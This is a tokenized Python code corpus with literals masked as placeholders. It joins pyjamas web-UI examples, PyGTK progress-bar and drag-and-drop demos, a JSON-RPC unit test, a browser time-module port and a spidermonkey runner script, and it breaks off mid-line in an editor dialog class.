vPanel = VerticalPanel ( ) <EOL> vPanel . add ( indent ( label , left = <NUM_LIT:5> ) ) <EOL> vPanel . add ( border ( indent ( contents , <NUM_LIT:10> ) ) ) <EOL> self . add ( vPanel ) <EOL> class PanelApp : <EOL> """<STR_LIT>""" <EOL> def onModuleLoad ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _curPanelID = None <EOL> self . _root = RootPanel ( ) <EOL> self . _panels = self . createPanels ( ) <EOL> self . showPanel ( self . getDefaultPanel ( ) ) <EOL> def showPanel ( self , panelID ) : <EOL> """<STR_LIT>""" <EOL> if panelID == self . _curPanelID : return <EOL> if self . _curPanelID is not None : <EOL> self . _root . remove ( self . _panels [ self . _curPanelID ] ) <EOL> self . _root . add ( self . _panels [ panelID ] ) <EOL> self . _curPanelID = panelID <EOL> def createPanels ( self ) : <EOL> """<STR_LIT>""" <EOL> Window . alert ( "<STR_LIT>" ) <EOL> def getDefaultPanel ( self ) : <EOL> """<STR_LIT>""" <EOL> Window . alert ( "<STR_LIT>" ) <EOL> class CommandWrapper : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , object , handler ) : <EOL> """<STR_LIT>""" <EOL> self . _object = object <EOL> self . _handler = handler <EOL> def execute ( self ) : <EOL> """<STR_LIT>""" <EOL> handler = getattr ( self . _object , self . _handler ) <EOL> handler ( ) </s>
<s> import pyjd <EOL> from pyjamas import Window <EOL> from pyjamas . ui . Tree import Tree <EOL> from pyjamas . ui . TreeItem import TreeItem <EOL> from pyjamas . ui . CheckBox import CheckBox <EOL> from pyjamas . ui . RootPanel import RootPanel <EOL> def onCb1 ( sender ) : <EOL> Window . alert ( '<STR_LIT>' + str ( sender ) + str ( sender . isChecked ( ) ) ) <EOL> def onCb2 ( sender ) : <EOL> Window . alert ( '<STR_LIT>' + str ( sender ) + str ( sender . isChecked ( ) ) ) <EOL> def main ( ) : <EOL> root = RootPanel ( ) <EOL> tree = Tree ( ) <EOL> cb1 = CheckBox ( '<STR_LIT>' ) <EOL> cb1 . addClickListener ( onCb1 ) <EOL> root . add ( cb1 ) <EOL> cb2 = CheckBox ( '<STR_LIT>' ) <EOL> cb2 . addClickListener ( onCb2 ) <EOL> item = TreeItem ( cb2 ) <EOL> tree . addItem ( item ) <EOL> root . add ( tree ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> pyjd . setup ( "<STR_LIT>" ) <EOL> main ( ) <EOL> pyjd . run ( ) </s>
<s> import pygtk <EOL> pygtk . require ( '<STR_LIT>' ) <EOL> import gtk , gobject <EOL> def progress_timeout ( pbobj ) : <EOL> if pbobj . activity_check . get_active ( ) : <EOL> pbobj . pbar . pulse ( ) <EOL> else : <EOL> new_val = pbobj . pbar . get_fraction ( ) + <NUM_LIT> <EOL> if new_val > <NUM_LIT:1.0> : <EOL> new_val = <NUM_LIT:0.0> <EOL> pbobj . pbar . set_fraction ( new_val ) <EOL> return True <EOL> class ProgressBar : <EOL> def toggle_show_text ( self , widget , data = None ) : <EOL> if widget . get_active ( ) : <EOL> self . pbar . set_text ( "<STR_LIT>" ) <EOL> else : <EOL> self . pbar . set_text ( "<STR_LIT>" ) <EOL> def toggle_activity_mode ( self , widget , data = None ) : <EOL> if widget . get_active ( ) : <EOL> self . pbar . pulse ( ) <EOL> else : <EOL> self . pbar . set_fraction ( <NUM_LIT:0.0> ) <EOL> def toggle_orientation ( self , widget , data = None ) : <EOL> if self . pbar . get_orientation ( ) == gtk . PROGRESS_LEFT_TO_RIGHT : <EOL> self . pbar . set_orientation ( gtk . PROGRESS_RIGHT_TO_LEFT ) <EOL> elif self . pbar . get_orientation ( ) == gtk . PROGRESS_RIGHT_TO_LEFT : <EOL> self . pbar . set_orientation ( gtk . PROGRESS_LEFT_TO_RIGHT ) <EOL> def destroy_progress ( self , widget , data = None ) : <EOL> gobject . source_remove ( self . timer ) <EOL> self . timer = <NUM_LIT:0> <EOL> gtk . main_quit ( ) <EOL> def __init__ ( self ) : <EOL> self . window = gtk . Window ( gtk . WINDOW_TOPLEVEL ) <EOL> self . window . set_resizable ( True ) <EOL> self . window . connect ( "<STR_LIT>" , self . destroy_progress ) <EOL> self . window . set_title ( "<STR_LIT>" ) <EOL> self . window . set_border_width ( <NUM_LIT:0> ) <EOL> vbox = gtk . VBox ( False , <NUM_LIT:5> ) <EOL> vbox . set_border_width ( <NUM_LIT:10> ) <EOL> self . window . add ( vbox ) <EOL> vbox . show ( ) <EOL> align = gtk . Alignment ( <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> vbox . pack_start ( align , False , False , <NUM_LIT:5> ) <EOL> align . show ( ) <EOL> self . pbar = gtk . ProgressBar ( ) <EOL> align . add ( self . pbar ) <EOL> self . pbar . show ( ) <EOL> self . timer = gobject . timeout_add ( <NUM_LIT:100> , progress_timeout , self ) <EOL> separator = gtk . HSeparator ( ) <EOL> vbox . pack_start ( separator , False , False , <NUM_LIT:0> ) <EOL> separator . show ( ) <EOL> table = gtk . Table ( <NUM_LIT:2> , <NUM_LIT:2> , False ) <EOL> vbox . pack_start ( table , False , True , <NUM_LIT:0> ) <EOL> table . show ( ) <EOL> check = gtk . CheckButton ( "<STR_LIT>" ) <EOL> table . attach ( check , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <EOL> gtk . EXPAND | gtk . FILL , gtk . EXPAND | gtk . FILL , <EOL> <NUM_LIT:5> , <NUM_LIT:5> ) <EOL> check . connect ( "<STR_LIT>" , self . toggle_show_text ) <EOL> check . show ( ) <EOL> self . activity_check = check = gtk . CheckButton ( "<STR_LIT>" ) <EOL> table . attach ( check , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <EOL> gtk . EXPAND | gtk . FILL , gtk . EXPAND | gtk . FILL , <EOL> <NUM_LIT:5> , <NUM_LIT:5> ) <EOL> check . connect ( "<STR_LIT>" , self . toggle_activity_mode ) <EOL> check . show ( ) <EOL> check = gtk . CheckButton ( "<STR_LIT>" ) <EOL> table . attach ( check , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <EOL> gtk . EXPAND | gtk . FILL , gtk . EXPAND | gtk . FILL , <EOL> <NUM_LIT:5> , <NUM_LIT:5> ) <EOL> check . connect ( "<STR_LIT>" , self . toggle_orientation ) <EOL> check . show ( ) <EOL> button = gtk . Button ( "<STR_LIT>" ) <EOL> button . connect ( "<STR_LIT>" , self . destroy_progress ) <EOL> vbox . pack_start ( button , False , False , <NUM_LIT:0> ) <EOL> button . set_flags ( gtk . CAN_DEFAULT ) <EOL> button . grab_default ( ) <EOL> button . show ( ) <EOL> self . window . show ( ) <EOL> def main ( ) : <EOL> gtk . main ( ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> ProgressBar ( ) <EOL> main ( ) </s>
<s> import pygtk <EOL> pygtk . require ( '<STR_LIT>' ) <EOL> import gtk <EOL> import string , time <EOL> import gtkxpm <EOL> class DragNDropExample : <EOL> HEIGHT = <NUM_LIT> <EOL> WIDTH = <NUM_LIT> <EOL> TARGET_TYPE_TEXT = <NUM_LIT> <EOL> TARGET_TYPE_PIXMAP = <NUM_LIT> <EOL> fromImage = [ ( "<STR_LIT>" , <NUM_LIT:0> , TARGET_TYPE_TEXT ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:0> , TARGET_TYPE_PIXMAP ) ] <EOL> toButton = [ ( "<STR_LIT>" , <NUM_LIT:0> , TARGET_TYPE_TEXT ) ] <EOL> toCanvas = [ ( "<STR_LIT>" , <NUM_LIT:0> , TARGET_TYPE_PIXMAP ) ] <EOL> def layout_resize ( self , widget , event ) : <EOL> x , y , width , height = widget . get_allocation ( ) <EOL> if width > self . lwidth or height > self . lheight : <EOL> self . lwidth = max ( width , self . lwidth ) <EOL> self . lheight = max ( height , self . lheight ) <EOL> widget . set_size ( self . lwidth , self . lheight ) <EOL> def makeLayout ( self ) : <EOL> self . lwidth = self . WIDTH <EOL> self . lheight = self . HEIGHT <EOL> box = gtk . VBox ( False , <NUM_LIT:0> ) <EOL> box . show ( ) <EOL> table = gtk . Table ( <NUM_LIT:2> , <NUM_LIT:2> , False ) <EOL> table . show ( ) <EOL> box . pack_start ( table , True , True , <NUM_LIT:0> ) <EOL> layout = gtk . Layout ( ) <EOL> self . layout = layout <EOL> layout . set_size ( self . lwidth , self . lheight ) <EOL> layout . connect ( "<STR_LIT>" , self . layout_resize ) <EOL> layout . show ( ) <EOL> table . attach ( layout , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , gtk . FILL | gtk . EXPAND , <EOL> gtk . FILL | gtk . EXPAND , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> vScrollbar = gtk . VScrollbar ( None ) <EOL> vScrollbar . show ( ) <EOL> table . attach ( vScrollbar , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , gtk . FILL | gtk . SHRINK , <EOL> gtk . FILL | gtk . SHRINK , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> hScrollbar = gtk . HScrollbar ( None ) <EOL> hScrollbar . show ( ) <EOL> table . attach ( hScrollbar , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , gtk . FILL | gtk . SHRINK , <EOL> gtk . FILL | gtk . SHRINK , <EOL> <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> vAdjust = layout . get_vadjustment ( ) <EOL> vScrollbar . set_adjustment ( vAdjust ) <EOL> hAdjust = layout . get_hadjustment ( ) <EOL> hScrollbar . set_adjustment ( hAdjust ) <EOL> layout . connect ( "<STR_LIT>" , self . receiveCallback ) <EOL> layout . drag_dest_set ( gtk . DEST_DEFAULT_MOTION | <EOL> gtk . DEST_DEFAULT_HIGHLIGHT | <EOL> gtk . DEST_DEFAULT_DROP , <EOL> self . toCanvas , gtk . gdk . ACTION_COPY ) <EOL> self . addImage ( gtkxpm . gtk_xpm , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> button = gtk . Button ( "<STR_LIT>" ) <EOL> button . show ( ) <EOL> button . connect ( "<STR_LIT>" , self . receiveCallback ) <EOL> button . drag_dest_set ( gtk . DEST_DEFAULT_MOTION | <EOL> gtk . DEST_DEFAULT_HIGHLIGHT | <EOL> gtk . DEST_DEFAULT_DROP , <EOL> self . toButton , gtk . gdk . ACTION_COPY ) <EOL> box . pack_start ( button , False , False , <NUM_LIT:0> ) <EOL> return box <EOL> def addImage ( self , xpm , xd , yd ) : <EOL> hadj = self . layout . get_hadjustment ( ) <EOL> vadj = self . layout . get_vadjustment ( ) <EOL> style = self . window . get_style ( ) <EOL> pixmap , mask = gtk . gdk . pixmap_create_from_xpm_d ( <EOL> self . window . window , style . bg [ gtk . STATE_NORMAL ] , xpm ) <EOL> image = gtk . Image ( ) <EOL> image . set_from_pixmap ( pixmap , mask ) <EOL> button = gtk . Button ( ) <EOL> button . add ( image ) <EOL> button . connect ( "<STR_LIT>" , self . sendCallback ) <EOL> button . drag_source_set ( gtk . gdk . BUTTON1_MASK , self . fromImage , <EOL> gtk . gdk . ACTION_COPY ) <EOL> button . show_all ( ) <EOL> self . layout . put ( button , int ( xd + hadj . value ) , int ( yd + vadj . value ) ) <EOL> return <EOL> def sendCallback ( self , widget , context , selection , targetType , eventTime ) : <EOL> if targetType == self . TARGET_TYPE_TEXT : <EOL> now = time . time ( ) <EOL> str = time . ctime ( now ) <EOL> selection . set ( selection . target , <NUM_LIT:8> , str ) <EOL> elif targetType == self . TARGET_TYPE_PIXMAP : <EOL> selection . set ( selection . target , <NUM_LIT:8> , <EOL> string . join ( gtkxpm . gtk_xpm , '<STR_LIT:\n>' ) ) <EOL> def receiveCallback ( self , widget , context , x , y , selection , targetType , <EOL> time ) : <EOL> if targetType == self . TARGET_TYPE_TEXT : <EOL> label = widget . get_children ( ) [ <NUM_LIT:0> ] <EOL> label . set_text ( selection . data ) <EOL> elif targetType == self . TARGET_TYPE_PIXMAP : <EOL> self . addImage ( string . split ( selection . data , '<STR_LIT:\n>' ) , x , y ) <EOL> def __init__ ( self ) : <EOL> self . window = gtk . Window ( gtk . WINDOW_TOPLEVEL ) <EOL> self . window . set_default_size ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . window . connect ( "<STR_LIT>" , lambda w : gtk . main_quit ( ) ) <EOL> self . window . show ( ) <EOL> layout = self . makeLayout ( ) <EOL> self . window . add ( layout ) <EOL> def main ( ) : <EOL> gtk . main ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> DragNDropExample ( ) <EOL> main ( ) </s>
<s> import unittest <EOL> import jsonrpclib <EOL> class TestJsolait ( unittest . TestCase ) : <EOL> def test_echo ( self ) : <EOL> s = jsonrpclib . ServerProxy ( "<STR_LIT>" , verbose = <NUM_LIT:0> ) <EOL> reply = s . echo ( "<STR_LIT>" ) <EOL> print reply <EOL> self . assert_ ( reply [ "<STR_LIT:result>" ] == "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from __pyjamas__ import JS , debugger <EOL> import math <EOL> timezone = JS ( "<STR_LIT>" ) <EOL> altzone = JS ( "<STR_LIT>" ) <EOL> if altzone > timezone : <EOL> d = timezone <EOL> timezone = altzone <EOL> altzone = d <EOL> _dst = timezone - altzone <EOL> d = JS ( "<STR_LIT>" ) <EOL> d = str ( d . toLocaleString ( ) ) . split ( ) [ - <NUM_LIT:1> ] <EOL> if d [ <NUM_LIT:0> ] == '<STR_LIT:(>' : <EOL> d = d [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> tzname = ( d , None ) <EOL> del d <EOL> __c__days = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> __c__months = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def time ( ) : <EOL> return float ( JS ( "<STR_LIT>" ) ) <EOL> class struct_time ( object ) : <EOL> n_fields = <NUM_LIT:9> <EOL> n_sequence_fields = <NUM_LIT:9> <EOL> n_unnamed_fields = <NUM_LIT:0> <EOL> tm_year = None <EOL> tm_mon = None <EOL> tm_mday = None <EOL> tm_hour = None <EOL> tm_min = None <EOL> tm_sec = None <EOL> tm_wday = None <EOL> tm_yday = None <EOL> tm_isdst = None <EOL> def __init__ ( self , ttuple = None ) : <EOL> if not ttuple is None : <EOL> self . tm_year = ttuple [ <NUM_LIT:0> ] <EOL> self . tm_mon = ttuple [ <NUM_LIT:1> ] <EOL> self . tm_mday = ttuple [ <NUM_LIT:2> ] <EOL> self . tm_hour = ttuple [ <NUM_LIT:3> ] <EOL> self . tm_min = ttuple [ <NUM_LIT:4> ] <EOL> self . tm_sec = ttuple [ <NUM_LIT:5> ] <EOL> self . tm_wday = ttuple [ <NUM_LIT:6> ] <EOL> self . tm_yday = ttuple [ <NUM_LIT:7> ] <EOL> self . tm_isdst = ttuple [ <NUM_LIT:8> ] <EOL> def __str__ ( self ) : <EOL> t = ( <EOL> self . tm_year , <EOL> self . tm_mon , <EOL> self . tm_mday , <EOL> self . tm_hour , <EOL> self . tm_min , <EOL> self . tm_sec , <EOL> self . tm_wday , <EOL> self . tm_yday , <EOL> self . tm_isdst , <EOL> ) <EOL> return t . __str__ ( ) <EOL> def __repr__ ( self ) : <EOL> return self . __str__ ( ) <EOL> def __getitem__ ( self , idx ) : <EOL> return [ self . tm_year , self . tm_mon , self . tm_mday , <EOL> self . tm_hour , self . tm_min , self . tm_sec , <EOL> self . tm_wday , self . tm_yday , self . tm_isdst ] [ idx ] <EOL> def __getslice__ ( self , lower , upper ) : <EOL> return [ self . tm_year , self . tm_mon , self . tm_mday , <EOL> self . tm_hour , self . tm_min , self . tm_sec , <EOL> self . tm_wday , self . tm_yday , self . tm_isdst ] [ lower : upper ] <EOL> def gmtime ( t = None ) : <EOL> if t is None : <EOL> t = time ( ) <EOL> date = JS ( "<STR_LIT>" ) <EOL> tm = struct_time ( ) <EOL> tm_year = tm . tm_year = int ( date . getUTCFullYear ( ) ) <EOL> tm . tm_mon = int ( date . getUTCMonth ( ) ) + <NUM_LIT:1> <EOL> tm . tm_mday = int ( date . getUTCDate ( ) ) <EOL> tm . tm_hour = int ( date . getUTCHours ( ) ) <EOL> tm . tm_min = int ( date . getUTCMinutes ( ) ) <EOL> tm . tm_sec = int ( date . getUTCSeconds ( ) ) <EOL> tm . tm_wday = ( int ( date . getUTCDay ( ) ) + <NUM_LIT:6> ) % <NUM_LIT:7> <EOL> tm . tm_isdst = <NUM_LIT:0> <EOL> startOfYear = JS ( "<STR_LIT>" ) <EOL> tm . tm_yday = <NUM_LIT:1> + int ( ( t - startOfYear . getTime ( ) / <NUM_LIT:1000> ) / <NUM_LIT> ) <EOL> return tm <EOL> def localtime ( t = None ) : <EOL> if t is None : <EOL> t = time ( ) <EOL> date = JS ( "<STR_LIT>" ) <EOL> dateOffset = date . getTimezoneOffset ( ) <EOL> tm = struct_time ( ) <EOL> tm_year = tm . tm_year = int ( date . getFullYear ( ) ) <EOL> tm_mon = tm . tm_mon = int ( date . getMonth ( ) ) + <NUM_LIT:1> <EOL> tm_mday = tm . tm_mday = int ( date . getDate ( ) ) <EOL> tm . tm_hour = int ( date . getHours ( ) ) <EOL> tm . tm_min = int ( date . getMinutes ( ) ) <EOL> tm . tm_sec = int ( date . getSeconds ( ) ) <EOL> tm . tm_wday = ( int ( date . getDay ( ) ) + <NUM_LIT:6> ) % <NUM_LIT:7> <EOL> tm . tm_isdst = <NUM_LIT:0> if timezone == <NUM_LIT> * date . getTimezoneOffset ( ) else <NUM_LIT:1> <EOL> startOfYear = JS ( "<STR_LIT>" ) <EOL> startOfYearOffset = startOfYear . getTimezoneOffset ( ) <EOL> startOfDay = JS ( "<STR_LIT>" ) <EOL> dt = float ( startOfDay . getTime ( ) - startOfYear . getTime ( ) ) / <NUM_LIT:1000> <EOL> dt = dt + <NUM_LIT> * ( startOfYearOffset - dateOffset ) <EOL> tm . tm_yday = <NUM_LIT:1> + int ( dt / <NUM_LIT> ) <EOL> return tm <EOL> def mktime ( t ) : <EOL> """<STR_LIT>""" <EOL> tm_year = t [ <NUM_LIT:0> ] <EOL> tm_mon = t [ <NUM_LIT:1> ] - <NUM_LIT:1> <EOL> tm_mday = t [ <NUM_LIT:2> ] <EOL> tm_hour = t [ <NUM_LIT:3> ] <EOL> tm_min = t [ <NUM_LIT:4> ] <EOL> tm_sec = t [ <NUM_LIT:5> ] <EOL> date = JS ( "<STR_LIT>" ) <EOL> utc = JS ( "<STR_LIT>" ) / <NUM_LIT:1000> <EOL> ts = date . getTime ( ) / <NUM_LIT:1000> <EOL> if t [ <NUM_LIT:8> ] == <NUM_LIT:0> : <EOL> if ts - utc == timezone : <EOL> return ts <EOL> return ts + _dst <EOL> return ts <EOL> def strftime ( fmt , t = None ) : <EOL> if t is None : <EOL> t = localtime ( ) <EOL> else : <EOL> if not isinstance ( t , struct_time ) and len ( t ) != <NUM_LIT:9> : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> tm_year = t [ <NUM_LIT:0> ] <EOL> tm_mon = t [ <NUM_LIT:1> ] <EOL> tm_mday = t [ <NUM_LIT:2> ] <EOL> tm_hour = t [ <NUM_LIT:3> ] <EOL> tm_min = t [ <NUM_LIT:4> ] <EOL> tm_sec = t [ <NUM_LIT:5> ] <EOL> tm_wday = t [ <NUM_LIT:6> ] <EOL> tm_yday = t [ <NUM_LIT:7> ] <EOL> date = JS ( "<STR_LIT>" ) <EOL> startOfYear = JS ( "<STR_LIT>" ) <EOL> firstMonday = <NUM_LIT:1> - ( ( startOfYear . getDay ( ) + <NUM_LIT:6> ) % <NUM_LIT:7> ) + <NUM_LIT:7> <EOL> firstWeek = JS ( "<STR_LIT>" ) <EOL> weekNo = date . getTime ( ) - firstWeek . getTime ( ) <EOL> if weekNo < <NUM_LIT:0> : <EOL> weekNo = <NUM_LIT:0> <EOL> else : <EOL> weekNo = <NUM_LIT:1> + int ( weekNo / <NUM_LIT> ) <EOL> def format ( c ) : <EOL> if c == '<STR_LIT:%>' : <EOL> return '<STR_LIT:%>' <EOL> elif c == '<STR_LIT:a>' : <EOL> return format ( '<STR_LIT:A>' ) [ : <NUM_LIT:3> ] <EOL> elif c == '<STR_LIT:A>' : <EOL> return __c__days [ format ( '<STR_LIT:w>' ) ] <EOL> elif c == '<STR_LIT:b>' : <EOL> return format ( '<STR_LIT:B>' ) [ : <NUM_LIT:3> ] <EOL> elif c == '<STR_LIT:B>' : <EOL> return __c__months [ tm_mon - <NUM_LIT:1> ] <EOL> elif c == '<STR_LIT:c>' : <EOL> return date . toLocaleString ( ) <EOL> elif c == '<STR_LIT:d>' : <EOL> return "<STR_LIT>" % tm_mday <EOL> elif c == '<STR_LIT:H>' : <EOL> return "<STR_LIT>" % tm_hour <EOL> elif c == '<STR_LIT:I>' : <EOL> return "<STR_LIT>" % ( tm_hour % <NUM_LIT:12> ) <EOL> elif c == '<STR_LIT>' : <EOL> return "<STR_LIT>" % tm_yday <EOL> elif c == '<STR_LIT:m>' : <EOL> return "<STR_LIT>" % tm_mon <EOL> elif c == '<STR_LIT:M>' : <EOL> return "<STR_LIT>" % tm_min <EOL> elif c == '<STR_LIT:p>' : <EOL> if tm_hour < <NUM_LIT:12> : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> elif c == '<STR_LIT:S>' : <EOL> return "<STR_LIT>" % tm_sec <EOL> elif c == '<STR_LIT>' : <EOL> raise NotImplementedError ( "<STR_LIT>" % c ) <EOL> elif c == '<STR_LIT:w>' : <EOL> return "<STR_LIT>" % ( ( tm_wday + <NUM_LIT:1> ) % <NUM_LIT:7> ) <EOL> elif c == '<STR_LIT>' : <EOL> return "<STR_LIT>" % weekNo <EOL> elif c == '<STR_LIT:x>' : <EOL> return "<STR_LIT:%s>" % date . toLocaleDateString ( ) <EOL> elif c == '<STR_LIT:X>' : <EOL> return "<STR_LIT:%s>" % date . toLocaleTimeString ( ) <EOL> elif c == '<STR_LIT:y>' : <EOL> return "<STR_LIT>" % ( tm_year % <NUM_LIT:100> ) <EOL> elif c == '<STR_LIT:Y>' : <EOL> return "<STR_LIT>" % tm_year <EOL> elif c == '<STR_LIT>' : <EOL> raise NotImplementedError ( "<STR_LIT>" % c ) <EOL> return "<STR_LIT:%>" + c <EOL> result = '<STR_LIT>' <EOL> remainder = fmt <EOL> re_pct = JS ( "<STR_LIT>" ) <EOL> JS ( "<STR_LIT>" ) <EOL> while remainder : <EOL> JS ( """<STR_LIT>""" ) <EOL> return str ( result ) <EOL> def asctime ( t = None ) : <EOL> if t is None : <EOL> t = localtime ( ) <EOL> return "<STR_LIT>" % ( __c__days [ ( t [ <NUM_LIT:6> ] + <NUM_LIT:1> ) % <NUM_LIT:7> ] [ : <NUM_LIT:3> ] , __c__months [ t [ <NUM_LIT:1> ] - <NUM_LIT:1> ] , t [ <NUM_LIT:2> ] , t [ <NUM_LIT:3> ] , t [ <NUM_LIT:4> ] , t [ <NUM_LIT:5> ] , t [ <NUM_LIT:0> ] ) <EOL> def ctime ( t = None ) : <EOL> return asctime ( localtime ( t ) ) <EOL> JS ( """<STR_LIT>""" ) <EOL> def _strptime ( datestring , format ) : <EOL> try : <EOL> return float ( JS ( "<STR_LIT>" ) ) <EOL> except : <EOL> raise ValueError ( "<STR_LIT>" % ( datestring , format ) ) <EOL> def strptime ( datestring , format ) : <EOL> try : <EOL> tt = localtime ( float ( JS ( "<STR_LIT>" ) ) ) <EOL> tt . tm_isdst = - <NUM_LIT:1> <EOL> return tt <EOL> except : <EOL> raise ValueError ( "<STR_LIT>" % ( datestring , format ) ) </s>
<s> import spidermonkey <EOL> import sys <EOL> from os . path import join , dirname , basename , abspath <EOL> from optparse import OptionParser <EOL> usage = """<STR_LIT>""" <EOL> currentdir = abspath ( dirname ( dirname ( __file__ ) ) ) <EOL> builddir = abspath ( "<STR_LIT:..>" ) <EOL> sys . path . append ( join ( builddir , "<STR_LIT>" ) ) <EOL> import pyjs <EOL> file_name = None <EOL> app_library_dirs = [ <EOL> currentdir , <EOL> join ( builddir , "<STR_LIT>" ) , <EOL> join ( builddir , "<STR_LIT>" ) , <EOL> join ( builddir , "<STR_LIT>" ) ] <EOL> cx = None <EOL> def pysm_print_fn ( arg ) : <EOL> print arg <EOL> def pysm_import_module ( parent_name , module_name ) : <EOL> if module_name == '<STR_LIT>' or module_name == '<STR_LIT>' : <EOL> return <EOL> if module_name == file_name : <EOL> return <EOL> exec "<STR_LIT>" % module_name <EOL> cx . add_global ( module_name , _module ) <EOL> def main ( ) : <EOL> global file_name <EOL> parser = OptionParser ( usage = usage ) <EOL> pyjs . add_compile_options ( parser ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT:input>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( output = None , <EOL> input = None , <EOL> ) <EOL> ( options , args ) = parser . parse_args ( ) <EOL> file_name = args [ <NUM_LIT:0> ] <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> module_name = args [ <NUM_LIT:1> ] <EOL> else : <EOL> module_name = None <EOL> debug = <NUM_LIT:0> <EOL> if options . input : <EOL> txt = open ( options . input , '<STR_LIT:r>' ) . read ( ) <EOL> else : <EOL> parser = pyjs . PlatformParser ( "<STR_LIT>" , verbose = False ) <EOL> parser . setPlatform ( "<STR_LIT>" ) <EOL> if file_name . endswith ( "<STR_LIT>" ) : <EOL> file_name = file_name [ : - <NUM_LIT:3> ] <EOL> app_translator = pyjs . AppTranslator ( <EOL> app_library_dirs , parser , <EOL> verbose = False , <EOL> debug = options . debug , <EOL> print_statements = options . print_statements , <EOL> function_argument_checking = options . function_argument_checking , <EOL> attribute_checking = options . attribute_checking , <EOL> source_tracking = options . source_tracking , <EOL> line_tracking = options . line_tracking , <EOL> store_source = options . store_source , <EOL> ) <EOL> app_libs , txt = app_translator . translate ( file_name , debug = debug , <EOL> library_modules = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> template = """<STR_LIT>""" <EOL> txt = template % { '<STR_LIT>' : app_libs , '<STR_LIT>' : file_name , <EOL> '<STR_LIT>' : txt } <EOL> txt += "<STR_LIT>" <EOL> txt += "<STR_LIT>" <EOL> txt += "<STR_LIT>" % file_name <EOL> if options . output : <EOL> fp = open ( options . output , '<STR_LIT:w>' ) <EOL> fp . write ( txt ) <EOL> fp . close ( ) <EOL> rt = spidermonkey . Runtime ( ) <EOL> global cx <EOL> cx = rt . new_context ( ) <EOL> cx . add_global ( "<STR_LIT>" , pysm_print_fn ) <EOL> cx . add_global ( "<STR_LIT>" , pysm_import_module ) <EOL> cx . execute ( txt ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from pyjamas . ui . TextArea import TextArea <EOL> from pyjamas . ui . HTML import HTML <EOL> from pyjamas . ui . Button import Button <EOL> from pyjamas . ui . DockPanel import DockPanel <EOL> from pyjamas . ui . DialogWindow import DialogWindow <EOL> from pyjamas . ui import HasAlignment <EOL> from pyjamas . ui . HorizontalPanel import HorizontalPanel <EOL> from pyjamas import DeferredCommand <EOL> from pyjamas . Timer import Timer <EOL> from pyjamas import DOM <EOL> from __pyjamas__ import doc <EOL> _editor_id = <NUM_LIT:0> <EOL> class EditDialogWindow ( DialogWindow ) : <EOL> def __init__ ( self , app ) : <EOL> self . app = app <EOL> DialogWindow . __init__ ( <EOL> self , modal = False , <EOL> minimize = True , maximize = True , close = True , <EOL> ) <EOL> self . closeButton = Button ( "<STR_LIT>" , self ) <EOL> self . saveButton = Button ( "<STR_LIT>" , self ) <EOL> self . setText ( "<STR_LIT>" ) <EOL> self . msg = HTML ( "<STR_LIT>" , True ) <EOL> global _editor_id <EOL> _editor_id += <NUM_LIT:1> <EOL> editor_id = "<STR_LIT>" % _editor_id <EOL> self . txt = TextArea ( Text = "<STR_LIT>" , VisibleLines = <NUM_LIT:30> , CharacterWidth = <NUM_LIT> , <EOL> ID = editor_id ) <EOL> dock = DockPanel ( ) <EOL> dock . setSpacing ( <NUM_LIT:4> ) <EOL> hp = HorizontalPanel ( Spacing = "<STR_LIT:5>" ) <EOL> hp . add ( self . saveButton ) <EOL> hp . add ( self . closeButton ) <EOL> dock . add ( hp , DockPanel . SOUTH ) <EOL> dock . add ( self . msg , DockPanel . NORTH ) <EOL> dock . add ( self . txt , DockPanel . CENTER ) <EOL> dock . setCellHorizontalAlignment ( hp , HasAlignment . ALIGN_RIGHT ) <EOL> dock . setCellWidth ( self . txt , "<STR_LIT>" ) <EOL> dock . setWidth ( "<STR_LIT>" ) <EOL> self . setWidget ( dock ) <EOL> self . editor_id = editor_id <EOL> self . editor_created = False <EOL> def add_tinymce ( self ) : <EOL> iframe = DOM . createElement ( "<STR_LIT>" ) <EOL> DOM . setElemAttribute ( iframe , "<STR_LIT:id>" , "<STR_LIT>" % self . editor_id ) <EOL> DOM . setElemAttribute ( iframe , "<STR_LIT>" , "<STR_LIT>" ) <EOL> doc ( ) . body . appendChild ( iframe ) <EOL> new_script = DOM . createElement ( 